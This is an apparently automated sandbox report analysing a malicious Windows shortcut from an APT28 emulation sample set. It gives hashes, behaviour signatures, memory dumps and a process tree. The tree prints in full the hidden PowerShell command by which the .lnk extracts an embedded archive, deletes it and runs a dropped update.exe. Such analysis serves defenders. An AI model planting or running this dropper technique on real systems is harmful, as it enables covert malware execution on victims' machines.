Overview

overview

8

Static

static

8

APT28/1-IA...d.docx

windows7-x64

4

APT28/1-IA...d.docx

windows10-2004-x64

1

APT28/2-Ex...ad.ps1

windows7-x64

3

APT28/2-Ex...ad.ps1

windows10-2004-x64

3

APT28/2-Ex...st.bat

windows7-x64

8

APT28/2-Ex...st.bat

windows10-2004-x64

8

APT28/2-Ex...ad.vbs

windows7-x64

8

APT28/2-Ex...ad.vbs

windows10-2004-x64

8

APT28/2-Ex...d.docm

windows7-x64

4

APT28/2-Ex...d.docm

windows10-2004-x64

1

APT28/2-Ex...nk.exe

windows7-x64

1

APT28/2-Ex...nk.exe

windows10-2004-x64

1

APT28/2-Ex...rt.lnk

windows7-x64

8

APT28/2-Ex...rt.lnk

windows10-2004-x64

8

APT28/2-Ex...ip.exe

windows7-x64

1

APT28/2-Ex...ip.exe

windows10-2004-x64

3

APT28/2-Ex...te.exe

windows7-x64

1

APT28/2-Ex...te.exe

windows10-2004-x64

1

update.exe

windows7-x64

1

update.exe

windows10-2004-x64

1

APT28/3-Pe...st.exe

windows7-x64

1

APT28/3-Pe...st.exe

windows10-2004-x64

1

APT28/3-Pe...st.dll

windows7-x64

1

APT28/3-Pe...st.dll

windows10-2004-x64

1

APT28/3-Pe...32.dll

windows7-x64

3

APT28/3-Pe...32.dll

windows10-2004-x64

3

APT28/3-Pe...64.dll

windows7-x64

1

APT28/3-Pe...64.dll

windows10-2004-x64

1

APT28/4-Pr...to.exe

windows7-x64

1

APT28/4-Pr...to.exe

windows10-2004-x64

1

APT28/4-Pr...LG.exe

windows7-x64

1

APT28/4-Pr...LG.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 11:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    APT28/2-Execution/lnk/Report.lnk

  • Size

    204KB

  • MD5

    ef4579d6e1e665056bc593ecbad1e473

  • SHA1

    de45b08deb1cccf50215a1318d83adf39d67f257

  • SHA256

    37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16

  • SHA512

    3ad5ef1e96a97009726322384a497ffedd5c48f6fc64ce7349adeabc99156f54df510f9cb5a5f49bc0d8b6a32a994756ea9b02f6dbff78f6ed2c7cc057d9d230

  • SSDEEP

    3072:J6LpD98Rr6vKDHJX0DPlHoPUBXgWXGMpgE6oLV2ISgA+4pOyB3yF3vxskk1GovNB:w4HhglHoyX8E6+V4gp9yBi3vxsXRb

Score
8/10
defense_evasionexecution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\APT28\2-Execution\lnk\Report.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk | where-object {$_.length -eq 00209578} | Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = 'C:\Users\Admin\AppData\Local\Temp\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force | Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force | Out-Null;& .\update.exe
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3764
        • C:\Users\Admin\AppData\Local\Temp\update.exe
          "C:\Users\Admin\AppData\Local\Temp\update.exe"
          4⤵
          • Executes dropped EXE
          PID:528

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_icev5os2.1bx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\update.exe
    Filesize

    321KB

    MD5

    536998185193b231e62d404c51121b8c

    SHA1

    0b86221d0237f06081e286746b1b5bb836ad4004

    SHA256

    d69fa80c8e54e8331e63c2d130a5d7b475f8c378971d9571db1d368662f7d6fd

    SHA512

    789f9bbac831b54aeb4c2dfb61d35e21f9b031897bc1d4daa37fad48ddd849223a6a1432a9428953b1b2541960c2b9367709ed17e22d2852ae6dc96f82a9bd09

    Download Submit

  • memory/528-33-0x00000000006B0000-0x0000000000708000-memory.dmp

    Filesize

    352KB

    Download

  • memory/528-32-0x0000000000400000-0x0000000000457000-memory.dmp

    Filesize

    348KB

    Download

  • memory/528-31-0x00000000006B0000-0x0000000000708000-memory.dmp

    Filesize

    352KB

    Download

  • memory/528-30-0x0000000000660000-0x00000000006AC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3764-15-0x00000163E8FC0000-0x00000163E8FD2000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3764-16-0x00000163E8FB0000-0x00000163E8FBA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3764-0-0x00007FFF96D93000-0x00007FFF96D95000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3764-29-0x00007FFF96D90000-0x00007FFF97851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3764-14-0x00007FFF96D90000-0x00007FFF97851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3764-12-0x00007FFF96D90000-0x00007FFF97851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3764-11-0x00007FFF96D90000-0x00007FFF97851000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3764-10-0x00000163E8D30000-0x00000163E8D52000-memory.dmp

    Filesize

    136KB

    Download